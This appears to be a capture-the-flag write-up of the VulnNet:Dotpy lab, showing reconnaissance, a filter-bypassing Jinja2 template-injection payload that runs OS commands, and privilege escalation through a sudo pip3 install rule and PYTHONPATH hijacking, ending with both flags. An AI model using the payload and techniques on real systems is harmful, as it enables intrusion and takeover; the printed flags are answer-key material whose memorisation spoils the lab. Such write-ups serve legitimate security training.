VulnNet:Dotpy — Recon
nmap -sCV 10.10.71.12 -oN nmap
Starting Nmap 7.92 ( https://nmap.org ) at 2022–05–25 10:07 IST
Nmap scan report for 10.10.71.12
Host is up (0.85s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE VERSION
8080/tcp open http Werkzeug httpd 1.0.1 (Python 3.6.9)
| http-title: VulnNet Entertainment — Login | Discover
|_Requested resource was http://10.10.71.12:8080/login
|_http-server-header: Werkzeug/1.0.1 Python/3.6.9
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 82.67 seconds
VulnNet:Dotpy — Web Server Enumeration
gobuster dir -u http://10.10.71.12:8080/ -x php,txt,zip,bak -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.71.12:8080/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php,txt,zip,bak
[+] Timeout: 10s
===============================================================
2022/05/25 10:31:29 Starting gobuster in directory enumeration mode
===============================================================
Error: the server returns a status code that matches the provided options for non existing urls. http://10.10.71.12:8080/b707c344–9fad-435f-a906–267224919c2b => 403 (Length: 3000). To continue please exclude the status code, the length or use the — wildcard switch
Register WebSite
Login Web-Site
The page request us to login/register. But I tried to navigate to a non-existing page
FOR EVERY WRONG INPUT, IT GIVES 403 ERROR
1. thought that maybe this webpage is vulnerable to SSTI Vulnerability
2. THEORY:
========================================
A server-side template injection occurs when an attacker is able to use native template syntax to inject a malicious payload into a template, which is then executed server-side.
Template engines are designed to generate web pages by combining fixed templates with volatile data. Server-side template injection attacks can occur when user input is concatenated directly into a template, rather than passed in as data. This allows attackers to inject arbitrary template directives in order to manipulate the template engine, often enabling them to take complete control of the server.
3. i tried some payloads to comfirm, i gave a request like this:
http://10.10.247.171:8080/index123
http://10.10.247.171:8080/index{{3*3}}
After checking the response, it comfirmed the vulnerability as it also output the result of this input .ie 9
After reading the article (hackertricks) and using the payload which is bypassing the most commom filters on PayloadsAllTheThings:
So Using Burp-Suite:
Bypassing most common filters (‘.’,’_’,’|join’,’[‘,’]’,’mro’ and ‘base’):
========================================
PayLoad = {{request|attr(‘application’)|attr(‘\x5f\x5fglobals\x5f\x5f’)|attr(‘\x5f\x5fgetitem\x5f\x5f’)(‘\x5f\x5fbuiltins\x5f\x5f’)|attr(‘\x5f\x5fgetitem\x5f\x5f’)(‘\x5f\x5fimport\x5f\x5f’)(‘os’)|attr(‘popen’)(‘#CODE HERE#’)|attr(‘read’)()}}
WE GOT CODE EXECUTION!!!
LETS TRY TO GET A REVERSE SHELL
MY PAYLOAD IS THE PYTHON REVERSE SHELL WHICH IS CONVERTED INTO HEX TO BYPASS THE FILTER:
Good! We are the web user, encode our shell to hex so we can run it, here you have the shell and the perfect encoding in a Cyberchef recipe ! And Run netcat
GOT A REVERSE SHELL
TTY Shell Upgrade :-
python -c “import pty;pty.spawn(‘/bin/bash’)”
Horizontal Privilege Escalation :-
web@vulnnet-dotpy:~/shuriken-dotpy$ sudo -l
sudo -l
Matching Defaults entries for web on vulnnet-dotpy:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User web may run the following commands on vulnnet-dotpy:
(system-adm) NOPASSWD: /usr/bin/pip3 install *
web@vulnnet-dotpy:~/shuriken-dotpy$
Interesting, we can run pip3 install with user system-adm…
Reading the GTFOBins page, I created another reverse shell payload:
sudo -u system-adm /usr/bin/pip3 install /tmp/shell
User Flag : —
THM{91c7547864fa1314a306f82a14cd7fb4}
Privilege Escalation :-
system-adm@vulnnet-dotpy:~$ sudo -l
sudo -l
Matching Defaults entries for system-adm on vulnnet-dotpy:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User system-adm may run the following commands on vulnnet-dotpy:
(ALL) SETENV: NOPASSWD: /usr/bin/python3 /opt/backup.py
system-adm@vulnnet-dotpy:~$
THIS ‘SETENV’ CAN BE EXPLOITED USING PYTHONPATH HIJACKING
SO I CREATED A FILE NAME ‘zipfile.py’ AS THIS LIBRARY IS BEING IMPORTED BY THE ‘backup.py’ PROGRAM IN THE ‘zipfile.py’, I ADDED THE PYTHON REVERSE SHELL SET THE PATH TO THE /dev/shm DIRECTORY
Exploit:-
I created another reverse shell payload:-
Root Flag
THM{734c7c2f0a23a4f590aa8600676021fb}
